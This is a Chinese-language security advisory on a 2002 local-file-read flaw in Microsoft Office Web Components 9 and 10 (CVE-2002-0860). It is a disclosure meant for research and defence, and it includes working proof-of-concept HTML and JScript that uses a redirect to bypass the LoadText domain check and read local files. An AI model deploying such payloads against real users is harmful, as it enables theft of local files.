首页 -> 安全研究
安全研究
安全漏洞
Microsoft OWC可导致本地文件可读漏洞
发布日期:2002-04-08
更新日期:2002-04-12
受影响系统:
Microsoft Office Web Components 9描述:
Microsoft Office Web Components 10
BUGTRAQ ID: 4453
CVE(CAN) ID: CVE-2002-0860
Microsoft Office Web Components (OWC)是一套ActiveX对象,使用Spreadsheets、Charts、Pivot tables等提供WEB页面更丰富的HTML文档形式。OWC在OFFCIE2000和OFFICE XP下都默认安装,也可以独立的下载使用。
Microsoft Office Web Components (OWC9和OWC10)中在处理Spreadsheet组件中存在漏洞,可导致远程攻击者利用URL重定向获得用户系统本地文件内容信息。
OWC9和OWC10中的Range对象的"LoadText"模式在第一个参数中接收URL信息,如果提供的URL与当前文档不在同一域中就会返回错误。
但是这个保护可以通过提供一个重定向到本地或者远程文件的URL来绕过。OWC被欺骗认为URL是安全的并装载文件内容到spreadsheet中,攻击者可以获取这些文件内容信息并传送给服务器。
<*来源:GreyMagic Software (security@greymagic.com)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-04/0094.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
下面的方法可以读取"c:/test.txt"文件内容,URL中的"getFile.asp"重定向到"file://c:/test.txt":
<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
style="display:none"></object>
<script language="jscript">
onload=function () {
try {
// Load file into spreadsheet
oSP.ActiveSheet.UsedRange.LoadText("getFile.asp");
// Read the spreadsheet
var oRng=oSP.ActiveSheet.UsedRange,
iRows=oRng.Rows.Count,
iCols=oRng.Columns.Count,
sRes="";
for (var iCRow=1;iCRow<=iRows;iCRow++) {
for (var iCCol=1;iCCol<=iCols;iCCol++) {
sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
}
sRes+="\n";
}
// Display result
alert(sRes);
}
catch (oErr) {
// Failed
alert("File not found.");
}
}
</script>
其中上面<object>元素的控件ID是OWC9的spreadsheet组件,OWC10的控件ID是"0002E551-0000-0000-C000-000000000046"。
攻击者可以使用下面的代码来选择OWC9或者OWC10:
<!-- Try to include OWC10 -->
<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10"
style="display:none">
<!-- Failed, try to include OWC9 -->
<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9"
style="display:none">
<!-- None found -->
Failed to load any of the spreadsheet components.
</object>
</object>
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 通过设置浏览器的安全配置来关闭执行Active X控件。
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/Default.asp
浏览次数:3215
严重程度:0(网友投票)
绿盟科技给您安全的保障